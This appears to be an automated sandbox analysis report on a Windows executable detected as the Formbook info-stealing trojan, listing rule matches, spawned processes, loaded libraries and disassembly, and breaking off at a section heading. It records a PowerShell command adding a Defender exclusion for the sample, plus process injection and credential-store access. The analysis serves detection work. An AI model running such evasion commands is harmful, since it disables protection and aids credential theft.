            Source: 0000000C.00000002.4092708936.0000000002F70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1847829194.0000000005250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000010.00000002.4094582069.0000000005760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1849163774.0000000005B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000B.00000002.4092694801.00000000027B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: NdYuOgHbM9.exe, --------.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@17/11@15/14
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2060
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5964:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3548:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dlbw15ex.j3e.ps1Jump to behavior
            Source: NdYuOgHbM9.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: NdYuOgHbM9.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: sfc.exe, 0000000C.00000002.4091957268.0000000002D7A000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.2023692361.0000000002D59000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.2023799863.0000000002D7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: NdYuOgHbM9.exeReversingLabs: Detection: 42%
            Source: NdYuOgHbM9.exeVirustotal: Detection: 39%
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeFile read: C:\Users\user\Desktop\NdYuOgHbM9.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\NdYuOgHbM9.exe "C:\Users\user\Desktop\NdYuOgHbM9.exe"
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe"
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2060 -s 1572
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"
            Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\NdYuOgHbM9.exe" -ForceJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\System32\notepad.exe "C:\Windows\System32\notepad.exe"Jump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"Jump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe"Jump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeProcess created: C:\Windows\SysWOW64\sfc.exe "C:\Windows\SysWOW64\sfc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\sfc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: NdYuOgHbM9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: NdYuOgHbM9.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: NdYuOgHbM9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: mscorlib.pdbMZ source: WER943D.tmp.dmp.9.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: ngen.pdb source: sfc.exe, 0000000C.00000002.4093679938.000000000379C000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4091957268.0000000002CE4000.00000004.00000020.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.000000000332C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2130456184.000000001A6AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: System.pdb` source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.ni.pdbRSDS source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Windows.Forms.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: wntdll.pdbUGP source: ngen.exe, 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1849713302.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1847772604.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: wntdll.pdb source: ngen.exe, ngen.exe, 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, sfc.exe, 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1849713302.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1847772604.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: sfc.pdbGCTL source: ngen.exe, 00000005.00000002.1847926282.00000000052A7000.00000004.00000020.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092313230.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER943D.tmp.dmp.9.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Drawing.ni.pdbRSDS source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Core.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: mscorlib.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER943D.tmp.dmp.9.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092220680.0000000000B1E000.00000002.00000001.01000000.00000007.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000000.1911809244.0000000000B1E000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: System.Drawing.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: mscorlib.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Core.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: sfc.pdb source: ngen.exe, 00000005.00000002.1847926282.00000000052A7000.00000004.00000020.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092313230.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER943D.tmp.dmp.9.dr
            Source: NdYuOgHbM9.exeStatic PE information: 0x8ECA66DD [Thu Nov 30 04:34:37 2045 UTC]
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeCode function: 0_2_00007FFD9B8A7967 push ebx; retf 0_2_00007FFD9B8A796A
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeCode function: 0_2_00007FFD9B8A752B push ebx; iretd 0_2_00007FFD9B8A756A
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeCode function: 0_2_00007FFD9B98026B push esp; retf 4810h0_2_00007FFD9B980312
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0041414A push edi; ret 5_2_0041414B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0040216F push cs; ret 5_2_0040217D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_00411279 push eax; ret 5_2_004112A2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_00417A13 pushfd ; iretd 5_2_00417A15
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_00411283 push eax; ret 5_2_004112A2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_004053DE push edx; ret 5_2_004053E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_00423383 push esi; iretd 5_2_0042339B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_00403550 push eax; ret 5_2_00403552
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0040CD07 push edi; retf 5_2_0040CD0E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0041DD80 pushad ; ret 5_2_0041DD81
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057309AD push ecx; mov dword ptr [esp], ecx5_2_057309B6
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031A09AD push ecx; mov dword ptr [esp], ecx12_2_031A09B6
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A9B2DE push cs; iretd 12_2_02A9B2DF
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A9B14F push es; iretd 12_2_02A9B15B
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02AA24E9 push ds; ret 12_2_02AA24F4
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A944C0 pushfd ; iretd 12_2_02A944C2
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A8DB32 push F61E88C4h; retf 12_2_02A8DB3A
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A9A82D pushad ; ret 12_2_02A9A82E
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A81E8B push edx; ret 12_2_02A81E8D
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A9FE30 push esi; iretd 12_2_02A9FE48
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A9FD83 push esi; iretd 12_2_02A9FD40
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A9FD2D push esi; iretd 12_2_02A9FD40
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A8DD26 push eax; ret 12_2_02A8DD4F
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A8DD30 push eax; ret 12_2_02A8DD4F

            Hooking and other Techniques for Hiding and Protection

            barindex
